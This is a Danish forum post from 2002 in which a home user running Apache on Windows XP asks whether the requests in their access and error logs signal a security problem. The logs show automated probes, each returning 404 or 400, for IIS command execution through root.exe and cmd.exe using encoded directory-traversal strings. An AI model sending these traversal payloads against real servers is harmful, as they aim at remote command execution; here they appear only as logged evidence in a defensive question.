Apache og sikkerhed???
Hej jeg har nylig opsat apache2 paa en win xp pro, efter lidt start problemer har jeg nu faaet det til at virke fint.- Men det foruroliger mig lidt naar jeg checker i access.log og error.log og ser folgende..
access.log
68.81.25.142 - - [21/Oct/2002:17:19:26 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
68.81.25.142 - - [21/Oct/2002:17:19:27 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
68.81.25.142 - - [21/Oct/2002:17:19:32 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
68.81.25.142 - - [21/Oct/2002:17:19:33 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
68.81.25.142 - - [21/Oct/2002:17:19:35 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
68.81.25.142 - - [21/Oct/2002:17:19:41 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
68.81.25.142 - - [21/Oct/2002:17:19:41 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
68.81.25.142 - - [21/Oct/2002:17:19:41 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
68.81.25.142 - - [21/Oct/2002:17:19:42 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
68.81.25.142 - - [21/Oct/2002:17:19:42 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
68.81.25.142 - - [21/Oct/2002:17:19:42 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
68.81.25.142 - - [21/Oct/2002:17:19:52 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
68.81.25.142 - - [21/Oct/2002:17:19:52 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
68.81.25.142 - - [21/Oct/2002:17:19:52 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
68.81.25.142 - - [21/Oct/2002:17:19:53 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
68.81.25.142 - - [21/Oct/2002:17:19:53 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
og error.log
[Mon Oct 21 16:53:50 2002] [error] [client 68.81.120.55] File does not exist: C:/Web/scripts
[Mon Oct 21 16:53:58 2002] [error] [client 68.81.120.55] File does not exist: C:/Web/MSADC
[Mon Oct 21 16:54:06 2002] [error] [client 68.81.120.55] File does not exist: C:/Web/c
[Mon Oct 21 16:54:17 2002] [warn] (720064)The specified network name is no longer available. : winnt_accept: Asynchronous AcceptEx failed.
er det er problem eller er det helt harmlost???
jeg har tiny pers. firewall, er der moger jeg kan gore derfra? hvis altsaa der er et problem.
paa siden MyServer.org har jeg testet mine porte, og naar jeg har min firewall sat til at modtage (in) fra port 80 gennem apache. saa siger de paa MyServer.org at der er en sikkerheds brist, men naar jeg enable port 80 er der ingen ude fra der kan komme til min server.
har jeg forstaaer alt dette her korect? og er der overhoveret er problem?
jeg har
Order allow,deny
Allow from all
pa min document root
